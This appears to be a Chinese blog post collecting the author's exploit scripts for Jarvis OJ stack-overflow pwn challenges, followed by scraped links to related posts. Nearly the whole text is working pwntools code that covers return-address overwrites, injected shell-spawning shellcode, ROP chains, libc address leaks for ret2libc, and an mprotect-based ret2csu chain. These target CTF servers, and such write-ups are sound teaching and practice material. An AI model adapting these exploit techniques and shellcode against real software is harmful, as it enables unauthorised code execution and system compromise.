最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上

Tell Me Something
此题与level0类似,请参考level0的writeup

http://www.cnblogs.com/WangAoBo/p/7591552.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 elf = ELF('./guestbook')

 good_game_addr = elf.symbols['good_game']

 #  io = process('./guestbook')

 io = remote('pwn.jarvisoj.com', 9876)

 payload = 'A' * 0x88 + p64(good_game_addr)

 io.recvuntil('message:\n')

 io.send(payload)

 print io.recvall()

 io.close()

Smashes

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 flag_addr = 0x400d21

 #  offset = 0x7fffffffcd68 - 0x7fffffffcb50

 #  payload = 'A' * offset + p64(flag_addr)

 payload = p64(flag_addr) * 200

 io = remote('pwn.jarvisoj.com', 9877)

 #  io = process('./smashes')

 io.recvuntil('name? ')

 io.sendline(payload)

 #  io.recvuntil('flag: ')

 io.recv()

 io.sendline()

 io.recv()
Test Your Memory
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./memory')

 win_func_addr = elf.symbols['win_func']

 cat_flag_addr = elf.search('cat flag').next()

 payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

 #  io = process('./memory')

 io = remote('pwn2.jarvisoj.com', 9876)

 io.recvuntil('> ')

 io.sendline(payload)

 print io.recvall()

 io.close()

[XMAN]level0

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level0')

 callsys_addr = elf.symbols['callsystem']

 #  io = process('./level0')

 io = remote('pwn2.jarvisoj.com', 9881)

 io.recvuntil('World\n')

 payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level1

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 shellcode = asm(shellcraft.i386.linux.sh())

 #  io = process('./level1')

 io = remote('pwn2.jarvisoj.com', 9877)

 text = io.recvline()[14: -2]

 #  print text[14:-2]

 buf_addr = int(text, 16)

 payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 #  io = process('./level2')

 io = remote('pwn2.jarvisoj.com', 9878)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2_x64

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2_x64')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 #  print type(p_rdi_r_addr)

 payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

 #  io = process('./level2_x64')

 io = remote('pwn2.jarvisoj.com', 9882)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3')

     libc = ELF('/lib/i386-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9879)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u32(io.recv(4))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3_x64

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3_x64')

     libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9883)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3_x64')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0)

 payload += p64(write_elf_addr)

 payload += p64(start_elf_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u64(io.recv(0x8))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(sh_addr)

 payload += p64(sys_addr)

 payload += p64(0xdeadbeef)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level4

 !/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 #  io = process('./level4')

 io = remote('pwn2.jarvisoj.com', 9880)

 elf = ELF('./level4')

 write_elf_addr = elf.symbols['write']

 start_elf_addr = elf.symbols['_start']

 read_elf_addr = elf.symbols['read']

 bss_addr = elf.bss()

 def leak(addr):

     payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)

     io.send(payload)

     leaked = io.recv(4)

     log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))

     return leaked

 d = DynELF(leak, elf = ELF('./level4'))

 sys_addr = d.lookup('system', 'libc')

 log.info("sys_addr -> 0x%x" % sys_addr)

 payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)

 io.send(payload)

 io.send('/bin/sh\0')

 sh_addr = bss_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level5

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 def Debug():

     raw_input("waiting for debug:")

     gdb.attach(io, "b *0x0000000000400618")

 from pwn import *

 context.terminal = ['deepin-terminal', '-x', 'bash', '-c']

 context.log_level = 'debug'

 elf = ELF('./level5')

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa

 mov_call = 0x0000000000400690

 local = 0

 if local:

     io = process('./level5')

     libc = ELF('./libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9884)

     libc = ELF('./libc-2.19.so')

 io.recvuntil('Input:\n')

 log.info("Step 1: leak read_addr")

 read_libc_addr = libc.symbols['read']

 read_got_addr = elf.got['read']

 write_elf_addr = elf.symbols['write']

 vuln_elf_addr = elf.symbols['vulnerable_function']

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0000)

 payload += p64(write_elf_addr)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 read_addr = u64(io.recv(8))

 io.recvuntil('Input:\n')

 log.info("leaked read_addr -> 0x%x" % read_addr)

 log.info("Step 2: write shellcode 2 bss")

 sh_addr = bss_addr = elf.bss()

 shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

 payload = 'B' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(len(shellcode) + 1)

 payload += p64(bss_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'C' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(shellcode + '\0')

 io.recvuntil('Input:\n')

 log.info("Step 3: hijack mprotect 2 __gmon_start__")

 mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']

 mprotect_hijack_addr = 0x0000000000600a70

 payload = 'D' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'E' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(mprotect_addr))

 io.recvuntil('Input:\n')

 log.info("Step 4: hijack sh/bss 2 __libc_start_main")

 sh_hijack_addr = 0x0000000000600a68

 payload = 'F' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'G' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(sh_addr))

 io.recvuntil('Input:\n')

 log.info("Step 5: fix bss 2 777")

 payload = 'H' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x7)

 #  payload += p64(len(shellcode) + 1)

 #  payload += p64(sh_hijack_addr)

 payload += p64(0x1000)

 payload += p64(0x00600000)

 payload += p64(mov_call)

 payload += 'I' * (7 * 8)

 payload += p64(vuln_elf_addr)

 #  Debug()

 io.send(payload)

 io.recvuntil('Input:\n')

 log.info("Step 6: execv shllcode")

 payload = 'J' * (0x80 + 0x8)

 #  payload += p64(sh_addr)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 log.info("Step 7: getshell")

 io.interactive()

 io.close()

Jarvis OJ - 栈系列部分pwn - Writeup的更多相关文章

  1. Jarvis OJ - 软件密码破解-1 -Writeup

    Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调 ...

  2. Jarvis OJ - [XMAN]level1 - Writeup

    Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分 ...

  3. Jarvis OJ - class10 -Writeup

    Jarvis OJ - class10 -Writeup 转载请注明出处:http://www.cnblogs.com/WangAoBo/p/7552266.html 题目: Jarivs OJ的一道 ...

  4. Jarvis OJ - DD-Hello -Writeup

    Jarvis OJ - DD-Hello -Writeup 转载请注明出处http://www.cnblogs.com/WangAoBo/p/7239216.html 题目: 分析: 第一次做这道题时 ...

  5. Jarvis OJ - 爬楼梯 -Writeup

    Jarvis OJ - 爬楼梯 -Writeup 本来是想逆一下算法的,后来在学长的指导下发现可以直接修改关键函数,这个题做完有种四两拨千斤的感觉,记录在这里 转载请标明出处:http://www.c ...

  6. Jarvis OJ - Baby's Crack - Writeup

    Jarvis OJ - Baby's Crack - Writeup M4x原创,欢迎转载,转载请表明出处 这是我第一次用爆破的方法做reverse,值得记录一下 题目: 文件下载 分析: 下载后解压 ...

  7. Jarvis OJ部分逆向

    Jarvis OJ部分逆向题解 很久没有写博客了,前天上Jarvis OJ刷了几道逆向,保持了一下感觉.都是简单题目,写个writeup记录一下. easycrackme int __cdecl ma ...

  8. Jarvis OJ - [XMAN]level3 - Writeup——ret2libc尝试

    这次除了elf程序还附带一个动态链接库 先看一下,很一般的保护 思路分析 在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数 但是用ida打开附带的链接库,可以看 ...

  9. Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

    100分的pwn 简单查看一下,果然还是比较简单的 放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护 所以我们很容易想到构造shellcode, ...

随机推荐

  1. 开发FTP服务接口,对外提供接口服务

    注意:本文只适合小文本文件的上传下载,因为post请求是有大小限制的.默认大小是2m,虽然具体数值可以调节,但不适合做大文件的传输 最近公司有这么个需求:以后所有的项目开发中需要使用ftp服务器的地方 ...

  2. salt 安装 以及salt-api使用

    salt--master    和 salt-minion 控制端 被控制端 通过 salt-api 访问 salt-master  来控制salt-minion 执行 命令  返回结果 LINUX ...

  3. Open Live Writer(olw)博客写作软件

    前言 wlw似乎不再提供下载了,从微软的官网下载安装程序之后,无法联网下载olw组件,所以写博客改用olw. olw是wlw的开源版本,所以wlw上的操作是可以在olw上继续使用的. 关于wlw的知识 ...

  4. gulp常用插件之cssnano使用

    更多gulp常用插件使用请访问:gulp常用插件汇总 cssnano这是一款将你的 CSS 文件做 多方面的的优化,以确保最终生成的文件 对生产环境来说体积是最小的插件. 更多使用文档请点击访问cha ...

  5. UVA1395 (最苗条的最小生成树)

    链接 https://vjudge.net/problem/UVA-1395 代码 #include<bits/stdc++.h> using namespace std; #define ...

  6. [Java]对double变量进行四舍五入,并保留小数点后位数

    1.功能 将double类型变量进行四舍五入,并保留小数点后位数 2.代码 import java.math.BigDecimal; import java.math.RoundingMode; im ...

  7. 用cookie存值

    ////用Request获取到客户端Cookie 判断是否为空 //if (Request.Cookies["CheckTime"] == null) //{ // //创建Coo ...

  8. 使用vue/cli 创建一个简单的项目

    首先,电脑安装了node.js官方要求8.9 或更高版本 (推荐 8.11.0+) npm install -g @vue/cli # OR yarn global add @vue/cli 全局安装 ...

  9. RabbitMQ的五种工作方式详细

    在了解之前得先有个RabbitMQ客户端.官网: https://www.rabbitmq.com/getstarted.html connections:无论生产者还是消费者,都需要与RabbitM ...

  10. 自己的系统重装之后,怎么去重新的装官方的office办公软件,详细教程

    1  访问官网地址--微软,并通过自己的微软账号进行登录,转到下面的界面 2   点击上图的菜单栏的offce菜单项,跳转到下图 3  点击  菜单栏的产品  之后选择  查看office的全部的历史 ...